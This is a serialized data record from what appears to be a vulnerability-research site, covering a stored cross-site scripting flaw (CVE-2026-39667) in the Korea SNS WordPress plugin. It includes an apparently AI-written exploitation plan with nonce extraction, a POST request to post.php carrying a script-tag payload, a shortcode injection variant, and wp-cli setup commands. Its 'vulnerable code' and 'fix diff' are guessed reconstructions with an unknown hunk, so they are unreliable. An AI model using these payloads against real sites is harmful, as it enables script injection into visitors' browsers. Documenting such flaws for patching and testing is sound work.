[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fzhh9brWjlHFV0DclEYFyxFObc01dGx53WSeJ5SNyq0s":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-39667","korea-sns-authenticated-author-stored-cross-site-scripting","Korea SNS \u003C= 1.7.0 - Authenticated (Author+) Stored Cross-Site Scripting","The Korea SNS plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","korea-sns",null,"\u003C=1.7.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-18 00:00:00","2026-04-15 21:26:24",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F185d380e-7e23-4260-bdeb-e88c8625f690?source=api-prod",[],"researched",false,3,"# Research Plan: CVE-2026-39667 - Korea SNS \u003C= 1.7.0 Stored XSS\n\n## 1. Vulnerability Summary\nThe **Korea SNS** plugin for WordPress (versions up to 1.7.0) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to adequately sanitize user-supplied input when saving post-specific social sharing settings and subsequently fails to escape this data when rendering it on the frontend. Authenticated users with **Author-level** permissions or higher can inject malicious JavaScript into fields (likely within a metabox on the post editor screen), which then executes in the browser of any user viewing the affected post.\n\n## 2. Attack Vector Analysis\n*   **Vulnerable Endpoint**: Post update\u002Fsave endpoint (`\u002Fwp-admin\u002Fpost.php`).\n*   **Vulnerable Parameters**: Likely parameters prefixed with `ksns_` or `korea_sns_` (e.g., `ksns_title`, `ksns_description`, or `ksns_url_custom`) provided via the post editor metabox.\n*   **Required Authentication**: Author-level (PR:L). This role has the `edit_posts` capability required to save post metadata.\n*   **Preconditions**: The plugin must be active, and the \"Korea SNS\" sharing buttons must be enabled for the post type being edited.\n\n## 3. Code Flow (Inferred)\n1.  **Registration**: The plugin registers a metabox on the post editing screen using `add_meta_boxes`.\n2.  **Input Collection**: During a post save or update, WordPress triggers the `save_post` hook.\n3.  **Data Sink (Database)**: The plugin's handler for `save_post` retrieves `$_POST` values (e.g., `$_POST['ksns_title']`) and saves them to the database using `update_post_meta($post_id, 'ksns_title', $value)` without using `sanitize_text_field`.\n4.  **Data Retrieval**: When the post is viewed on the frontend, the plugin hooks into `the_content` or `wp_footer`.\n5.  **Data Sink (Output)**: The plugin calls `get_post_meta($post->ID, 'ksns_title', true)` and echoes the value directly into the HTML without using `esc_html`, `esc_attr`, or `wp_kses`.\n\n## 4. Nonce Acquisition Strategy\nTo exploit this via a direct HTTP request to `post.php`, a valid `_wpnonce` for the post edit action is required.\n\n1.  **Create\u002FIdentify Post**: Ensure a post exists that the Author user can edit.\n2.  **Navigate to Editor**: Use the execution agent to navigate to the post edit page: `\u002Fwp-admin\u002Fpost-new.php` or `\u002Fwp-admin\u002Fpost.php?post=ID&action=edit`.\n3.  **Extract Nonces**:\n    *   The primary WordPress nonce for saving posts is located in the `#_wpnonce` hidden input field.\n    *   Use `browser_eval` to extract it:\n        ```javascript\n        document.querySelector('#_wpnonce').value\n        ```\n    *   If the plugin uses a specific nonce for its metabox (e.g., `ksns_nonce`), extract that as well.\n\n## 5. Exploitation Strategy\n**Step 1: Authenticate as Author**\nLog in to the WordPress instance with a user assigned the \"Author\" role.\n\n**Step 2: Identify Meta Parameters**\nVisit the post editor for an existing post. Look for a metabox titled \"Korea SNS\" or similar. Inspect the source code of the inputs to find the `name` attributes. \n*Assumption for Payload (inferred):* The parameter is `ksns_title`.\n\n**Step 3: Perform Post Update with Payload**\nSend a POST request to `\u002Fwp-admin\u002Fpost.php` to update the post metadata.\n\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n*   **Method**: `POST`\n*   **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters**:\n    *   `action`: `editpost`\n    *   `post_ID`: `[POST_ID]`\n    *   `_wpnonce`: `[EXTRACTED_NONCE]`\n    *   `ksns_title`: `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>` (Payload designed to break out of an attribute or tag)\n    *   `post_title`: `XSS Test Post`\n\n**Step 4: Trigger XSS**\nNavigate to the public URL of the post created\u002Fedited in Step 3.\n\n## 6. Test Data Setup\n1.  **Plugin Installation**: Ensure `korea-sns` version 1.7.0 is installed and active.\n2.  **User Creation**: Create an Author user:\n    ```bash\n    wp user create attacker attacker@example.com --role=author --user_pass=password123\n    ```\n3.  **Post Creation**: Create a post as the author:\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"Vulnerable Post\" --post_author=$(wp user get attacker --field=ID)\n    ```\n\n## 7. Expected Results\n*   **Storage**: The `update_post_meta` call should succeed, storing the raw `\u003Cscript>` tag in the `wp_postmeta` table.\n*   **Rendering**: When viewing the post on the frontend, the response HTML should contain the unescaped script:\n    ```html\n    \u003Cdiv class=\"korea-sns-container\" data-title=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">\n    ```\n*   **Execution**: The browser should trigger an alert box showing the document domain.\n\n## 8. Verification Steps\n1.  **Check Database via WP-CLI**: Verify the metadata is stored without sanitization.\n    ```bash\n    wp post meta list [POST_ID] --keys=ksns_title\n    ```\n2.  **Inspect Frontend HTML**: Use the `http_request` tool to fetch the post content and grep for the payload.\n    ```bash\n    # (Pseudo-command for the agent)\n    GET \u002F?p=[POST_ID] -> Look for \"\u003Cscript>alert\"\n    ```\n\n## 9. Alternative Approaches\n*   **Metabox Bypass**: If the plugin doesn't check the nonce during `save_post` (common in older plugins), the update could potentially be performed via CSRF or a simpler request omitting standard WP parameters.\n*   **Shortcode Injection**: If the plugin provides a shortcode like `[korea-sns title=\"...\"]`, test if injecting the payload into the shortcode attribute triggers XSS when the post is rendered.\n    *   *Payload:* `[korea-sns title='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`\n*   **Direct Option Update**: If the \"Author+\" description is slightly inaccurate and the vulnerability is in the global settings, try updating options via `admin-ajax.php` if the `current_user_can` check is missing or weak.","The Korea SNS plugin for WordPress (up to and including version 1.7.0) is vulnerable to Stored Cross-Site Scripting due to insufficient input sanitization and output escaping of post-specific social sharing metadata. Authenticated attackers with Author-level access or higher can inject arbitrary web scripts into metadata fields such as 'ksns_title', which are subsequently executed in the browsers of users viewing the affected posts.","\u002F\u002F Inferred from research plan: Post metadata is saved without sanitization\nupdate_post_meta($post_id, 'ksns_title', $value);\n\n---\n\n\u002F\u002F Inferred from research plan: Metadata is retrieved and output without escaping\n$ksns_title = get_post_meta($post->ID, 'ksns_title', true);\necho $ksns_title;","--- a\u002Fkorea-sns.php\n+++ b\u002Fkorea-sns.php\n@@ -unknown @@\n- update_post_meta($post_id, 'ksns_title', $value);\n+ update_post_meta($post_id, 'ksns_title', sanitize_text_field($value));\n \n- echo get_post_meta($post->ID, 'ksns_title', true);\n+ echo esc_attr(get_post_meta($post->ID, 'ksns_title', true));","1. Authenticate as a user with Author, Editor, or Administrator permissions.\n2. Access the post editor for any existing post or create a new post.\n3. Identify the 'Korea SNS' metabox and extract the current '_wpnonce' from the post editor's HTML source.\n4. Send a POST request to \u002Fwp-admin\u002Fpost.php with 'action=editpost' and the target 'post_ID'.\n5. Include a malicious payload in a metadata parameter (e.g., ksns_title=\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\").\n6. View the published post on the frontend to trigger the execution of the stored script.","gemini-3-flash-preview","2026-04-19 04:26:14","2026-04-19 04:26:32",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkorea-sns\u002Ftags"]